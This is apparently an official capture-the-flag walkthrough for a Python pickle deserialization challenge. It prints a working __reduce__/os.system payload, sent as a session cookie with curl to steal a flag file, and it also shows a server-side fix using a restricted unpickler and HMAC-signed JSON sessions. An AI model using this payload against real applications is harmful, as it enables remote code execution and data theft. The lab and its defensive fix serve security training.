HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Pickle RCE — Deserialization

Deserialization Attacks · Insecure Deserialization (Python Pickle)
Difficulty: Advanced
Vuln class: Insecure Deserialization (Python Pickle)
Steps: 3
// Objective
Craft a malicious Python pickle payload to achieve RCE and read the flag from the server.
// Tools required
Python, Burp Suite, curl
// Step-by-step walkthrough
1. Understand the target
The app deserialises the session cookie using Python's pickle module. During deserialisation, pickle calls the callable that an object's __reduce__ method returned when it was pickled, so a crafted pickle can execute arbitrary code.
2. Craft the malicious pickle payload
Create a Python class whose __reduce__ method returns os.system together with a command that writes the flag to a readable path.
Command / Input
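import pickle, os, base64
class Exploit(object):
    # __reduce__ tells pickle which callable and arguments to invoke on load
    def __reduce__(self):
        return (os.system, ('cp /flag.txt /tmp/pwn.txt',))
# Serialise the object and base64-encode it for use as the cookie value
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(payload)
The payload is a base64-encoded pickle of an object that calls os.system when deserialised.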
3. Send the payload and read the flag
Set the session cookie to your base64-encoded payload, make a request (triggering deserialisation), then fetch the output file.
Command / Input
curl http://TARGET/ -H "Cookie: session=BASE64_PAYLOAD"
curl http://TARGET/static/pwn.txt
Output
HackrGG{p1ckl3_rc3_d3s3r14l1z3d}
// Flag
Flag value
HackrGG{p1ckl3_rc3_d3s3r14l1z3d}
Written to /tmp/pwn.txt (served at /static/pwn.txt) by the RCE payload.
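// Added example: fixing the cookie handling
The server-side fix for the behaviour described in step 1, as an added example that is not part of the original walkthrough or the challenge's code: a stopgap unpickler that refuses every global lookup, next to the preferred replacement, an HMAC-signed JSON session. SECRET_KEY, the function names and the harmless Probe class are assumptions constructed for the demonstration.

```python
import base64, hashlib, hmac, io, json, pickle

SECRET_KEY = b"constructed-demo-key"  # assumption: server-only secret, loaded from config

class NoGlobalsUnpickler(pickle.Unpickler):
    """Stopgap: refuse every global lookup so a __reduce__ callable never resolves."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def restricted_loads(cookie_b64):
    """Unpickle containers and primitives only; raises UnpicklingError otherwise."""
    return NoGlobalsUnpickler(io.BytesIO(base64.b64decode(cookie_b64))).load()

def _tag(body: bytes) -> bytes:
    return hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode()

def sign_session(data):
    """Preferred fix: JSON body plus HMAC-SHA256 tag, no pickle on the request path."""
    body = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode())
    return (body + b"." + _tag(body)).decode()

def load_session(cookie):
    """Return the session dict, or None if the tag does not verify."""
    body, _, tag = cookie.encode().rpartition(b".")
    if not hmac.compare_digest(tag, _tag(body)):
        return None  # verify before decoding anything
    return json.loads(base64.urlsafe_b64decode(body))

class Probe:
    """Constructed, harmless stand-in for a __reduce__ object (resolves builtins.len)."""
    def __reduce__(self):
        return (len, ("probe",))

def demo():
    probe = base64.b64encode(pickle.dumps(Probe())).decode()
    try:
        restricted_loads(probe)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    good = sign_session({"user": "alice"})
    return blocked, load_session(good), load_session(probe), load_session("x" + good)

if __name__ == "__main__":
    print(demo())
```

The restricted unpickler still parses attacker-controlled pickle data, so treat it as a transitional control; the signed JSON path never hands cookie bytes to pickle at all.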